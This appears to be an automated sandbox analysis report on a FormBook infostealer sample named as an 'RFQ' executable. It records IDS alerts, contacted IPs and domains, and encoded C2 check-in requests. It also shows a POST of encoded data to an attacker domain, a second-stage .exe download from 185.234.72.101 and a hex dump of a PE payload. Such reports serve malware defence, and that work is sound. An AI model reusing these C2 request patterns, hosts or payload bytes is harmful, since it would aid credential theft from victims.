Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49779 -> 35.190.52.58:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49780 -> 202.95.21.152:80
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Jul 2024 01:12:30 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 03 Jul 2024 05:35:30 GMTETag: "f0400-61c5132d1e957"Accept-Ranges: bytesContent-Length: 984064Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ea 3a a0 f5 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9c 0e 00 00 66 00 00 00 00 00 00 32 bb 0e 00 00 20 00 00 00 c0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 df ba 0e 00 4f 00 00 00 00 c0 0e 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0f 00 0c 00 00 00 c0 9d 0e 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 38 9b 0e 00 00 20 00 00 00 9c 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 64 00 00 00 c0 0e 00 00 64 00 00 00 9e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0f 00 00 02 00 00 00 02 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 bb 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 58 6b 00 00 c0 45 00 00 03 00 00 00 35 
00 00 06 18 b1 00 00 a8 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 1a 02 00 00 01 00 00 11 02 16 7d 01 00 00 04 02 73 15 00 00 0a 7d 03 00 00 04 02 14 7d 04 00 00 04 02 28 16 00 00 0a 00 00 02 28 0e 00 00 06 00 02 7b 03 00 00 04 18 6f 17 00 00 0a 00 28 43 00 00 06 14 fe 01 0a 06 2c 62 00 02 7b 05 00 00 04 72 01 00 00 70 6f 18 00 00 0a 00 02 72 01 00 00 70 6f 18 00 00 0a 00 02 7b 0b 00 00 04 28 4a 00 00 06 0b 12 01 28 19 00 00 0a 6f 18 00 00 0a 00 02 7b 12 00 00 04 17 6f 1a 00 00 0a 00 02 7b 15 00 00 04 72 13 00 00 70 6f 18 00 00 0a 00 02 16 7d 02 00 00 04 00 38 55 01 00 00 00 02 17 7d 01 00 00 04 02 7b 05 00 00 04 72 29 00 00 70 6f 18 00 00 0a 00 02 72 29 00 00 70 6f 18 00 00 0a 00 28 43 00 00 06 0c 02 7b 0b 00 00 04 08 6f 58 00 00 06 0b 12 01 28 19 00 00 0a 6f 18 00 00 0a 00 02 7b 0a 00 00 04 08 6f 5a 00 00 06 6f 18 00 00 0a 00 02 7b 09 00 00 04 08 6f 5e 00 00 06 0b 12 01 28 19 00 00 0a 6f 18 00 00 0a 00 02 7b 08 00 00 04 08 6f
Source: Joe Sandbox View | IP Address: 202.95.21.152
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | IP Address: 203.161.55.102
Source: Joe Sandbox View | ASN Name: BCPL-SGBGPNETGlobalASNSG
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View | ASN Name: INTERHOPCA
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00EE25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, | 0_2_00EE25E2
              Source: global trafficHTTP traffic detected: GET /p1dd/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=G7DDmCfNGXy3uJCEgcIIU1iXFvarFYWbvsRS9sxoYaNScQyM2A1goKEbo8KV9mX8trrejs5AH6YGa7AwDEXag2zD7gw0a+PZJfygUURv+5LCwJWR5NAeUOI= HTTP/1.1Host: www.778981.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /kfqo/?n02X2xPX=NiOdQOuMLD2zHgMWwKws4JzuutDmLpx3tWxYTf2s7ZGupi3Uz5m5Dts89dE7D44P7JMDqAvEJ+8u+Llyo4b9pPx+fjdmUm+qFImntH+EZRPwIZM2dcS4AHM=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1Host: www.binpvae.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /1kbe/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=tZQfW8UiiNJTf5Fq5WrX9vmmZrioxCoVqMwq5i80b8QJkwpSgFAdETlO4QFSoDRfTxjpMxprnPemrx/P1Sfw5KD2hu+ipHyltaJOhZhwSC5dlgXXfIxM6PM= HTTP/1.1Host: www.a9jcpf.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /il19/?n02X2xPX=2W0Inf+zka60rkge6x3gGQQeo1iuz6hi+bPXuzv4I1vHSGtqZzoorLZZnoCmwyX2i4rMR0gWWwZYBzao7rAttPu5367SyozTICrQ88OWOZt9joXCP1iWm4I=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1Host: www.mhtnvro.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /ff8d/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=ohJD03igrpR8lwlwc1M4EqZrzingiHicFb+y4T5GGfrPyp+0FgUaOIwicDYxE9IqyQjr9lfiRuNbkNF7eyT6Zergy2OfkJkLywWhdn0W3d/t29Aith2p64g= HTTP/1.1Host: www.lexiecos.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /VT3g2PdlLRVpwBp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.234.72.101Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /l8a4/?n02X2xPX=CPL7YN3vcnDyuUFtA6pv3uMhLFbLrJb1JE9LZisFmiEQ0vYrwOGtj9QBvlTfLzXcbjIACE/TYt0vO88JJ7+OI7LCsTQn12dDmlA0tsWVEcE74AqN9n1fFjE=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1Host: www.augaqfp.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /cns4/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=b+X9HsydX2EZhoFbHWDGWLn8qSDjJiBvgg2FVhcLABkhzzs0ucmBPDMRqtKe3XUMFDw5FS9Ji9Imkcb4M+SgV1CrLIKWT8R/LC2e+AlJEb/hHwO3uGNSJEs= HTTP/1.1Host: www.webuyfontana.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.ndhockeyprospects.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Source: global trafficHTTP traffic detected: GET /rmef/?n02X2xPX=UdI5Nug9LeCq3QKyZxAFTuhDHYNaCA3T0/tR5L8b4jWaA2fUCVH3fLw1ebDEBIsiTWaLxfrgjTz4bD/84RJrNmZZ6yqPN++//ptV/K/4BOxQ2TPEoKO+wL0=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1Host: www.ytw6.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /2e2r/?n02X2xPX=0euIbLTFP3+EyEtzvor9i8vHBXpYgQpCpm4T5C+2kVz8Gw9LnD+VjddQp9QTALZxA8pe/VRvpSGAU2oGCWkdjrfpA+HWsjyp03alRT8mG3hS2I+8+ag3/fo=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1Host: www.hsck520.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /3in6/?b4=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&5DGDh=Hn3dOR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.qmancha.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | DNS traffic detected: DNS query: www.778981.com
Source: global traffic | DNS traffic detected: DNS query: www.binpvae.lol
Source: global traffic | DNS traffic detected: DNS query: www.byteffederal.com
Source: global traffic | DNS traffic detected: DNS query: www.jjkelker.com
Source: global traffic | DNS traffic detected: DNS query: www.a9jcpf.top
Source: global traffic | DNS traffic detected: DNS query: www.mhtnvro.lol
Source: global traffic | DNS traffic detected: DNS query: www.lexiecos.top
Source: global traffic | DNS traffic detected: DNS query: www.augaqfp.lol
Source: global traffic | DNS traffic detected: DNS query: www.webuyfontana.com
Source: global traffic | DNS traffic detected: DNS query: www.ytw6.top
Source: global traffic | DNS traffic detected: DNS query: www.ndhockeyprospects.com
Source: global traffic | DNS traffic detected: DNS query: www.caroinapottery.com
Source: global traffic | DNS traffic detected: DNS query: www.hsck520.com
Source: global traffic | DNS traffic detected: DNS query: www.qmancha.com
Source: global traffic | DNS traffic detected: DNS query: www.mebutnotme.store
Source: global traffic | DNS traffic detected: DNS query: www.cloud-force.club
              Source: unknownHTTP traffic detected: POST /kfqo/ HTTP/1.1Host: www.binpvae.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.binpvae.lolReferer: http://www.binpvae.lol/kfqo/Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 205Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 6e 30 32 58 32 78 50 58 3d 41 67 6d 39 54 37 44 4b 4d 41 32 38 4e 6e 70 74 34 4c 63 69 39 59 44 36 6f 74 7a 43 42 4c 67 71 74 32 70 78 59 36 58 41 35 71 79 75 6c 48 44 64 31 49 36 6e 44 4d 51 65 6d 34 70 57 4f 59 31 35 37 4c 59 70 78 30 50 54 51 63 73 48 6d 5a 34 4c 6a 4c 6a 43 2b 70 78 77 4d 77 42 77 52 55 32 6d 54 59 50 66 73 6e 69 45 4f 47 2f 47 4e 73 6f 62 63 38 2b 44 49 31 74 6b 55 69 58 32 70 78 54 56 61 4e 75 54 39 72 2b 58 35 4c 34 58 74 6f 74 6f 73 34 48 4a 4c 67 4a 46 67 45 47 6e 4c 57 5a 61 43 49 38 34 66 57 4e 51 56 55 6e 78 4a 6b 51 6f 41 41 35 4d 72 6a 41 6a 35 48 50 4f 57 49 31 68 4c 77 3d 3d Data Ascii: n02X2xPX=Agm9T7DKMA28Nnpt4Lci9YD6otzCBLgqt2pxY6XA5qyulHDd1I6nDMQem4pWOY157LYpx0PTQcsHmZ4LjLjC+pxwMwBwRU2mTYPfsniEOG/GNsobc8+DI1tkUiX2pxTVaNuT9r+X5L4Xtotos4HJLgJFgEGnLWZaCI84fWNQVUnxJkQoAA5MrjAj5HPOWI1hLw==
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 01:12:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 01:12:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 01:12:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 01:13:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
